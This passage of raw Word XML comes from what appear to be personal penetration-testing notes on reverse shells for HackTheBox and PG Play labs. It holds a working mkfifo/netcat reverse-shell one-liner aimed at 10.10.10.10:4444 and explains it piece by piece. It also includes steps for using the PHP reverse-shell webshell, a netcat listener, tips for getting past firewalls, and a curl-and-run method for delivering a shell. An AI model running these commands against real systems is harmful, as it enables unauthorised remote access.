          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/webshells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Includes directories like php and perl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want the php rev shell, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /usr/share/webshells/php/php-reverse-shell.php .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nano php-reverse-shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="104"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this to edit the IP address and port </w:t>
      </w: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hyperlink r:id="rId325">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Reverse shell github cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="855"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Your operating system matters. Some scripts will have a "cmd" argument and if you're on Linux, it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then if you are on windows it should be "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe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t xml:space="preserve">Remember to set up a listener as such (netcat):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be sure to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'sudo' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when setting up your listener for ports under 1024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I REALLY RECOMMEND you use a common port for reverse shell that the target machine is already using, since it's less likely to be blocked. They sometimes block ports like 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap allows for arrow keys and tab complete and makes it so much better!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: USE rlwrap!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">l : Listening mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v : Verbose mode. Displays status messages in more detail.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">n : Numeric-only IP address. No hostname resolution. DNS is not being used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1438"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">p : Port. Use to specify a particular port for listening</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forcing /bin/bash or /bin/sh:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I must have gotten distracted and not finished this section, but I vaguely remember a command used to force /bin/bash instead of /bin/sh or vice versa. Probably from a PG Play box</w:t>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is a unique Netcat Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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t xml:space="preserve">Try this one if a regular Reverse Shell doesn't work!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one uses /bin/sh while the bash one uses /bin/bash. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a bash one doesn't work, try using one that uses /bin/sh, like the one below or any other one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can do "CTRL + F" on this website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId326">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F8E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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t xml:space="preserve">It has been used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Celestial and Cronos HTB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and also used in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId327">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Shakabrah</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play) At least for the Cronos, a normal Bash didn't work, while this one did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 2&gt;&amp;1 | nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; /tmp/f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm /tmp/f; mkfifo /tmp/f:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Removes any existing file named /tmp/f and creates a named pipe (FIFO) at /tmp/f.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A named pipe allows one process to write data and another to read it asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /tmp/f | /bin/sh -i 2&gt;&amp;1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reads input from the pipe (/tmp/f) using cat, and pipes it into an interactive shell (/bin/sh -i).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The 2&gt;&amp;1 redirects the shell's standard error (descriptor 2) to standard output (descriptor 1), ensuring all output (stdout and stderr) goes through the same stream.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| nc &lt;attacker-ip&gt; &lt;attacker-port&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses Netcat (nc) to connect to the attacker's machine at the specified IP and port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any input received from the attacker's connection is sent to the shell, and the shell's output is sent back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; /tmp/f:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="283"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sends any output from the reverse shell back into the named pipe (/tmp/f), completing the loop.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tu46e05hhb5l" w:id="132"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse shell via arbitrary code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we are allowed to run arbitrary code (as shown in Codify HTB, where we were inside a JavaScript sandbox but we escaped and could run terminal code as the host), but it doesn't allow us to run a reverse shell directly, we can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">host a reverse shell via python,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then make the host (target)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl our reverse shell and then run it directly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing us to get a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000F9F">
      <w:pPr>
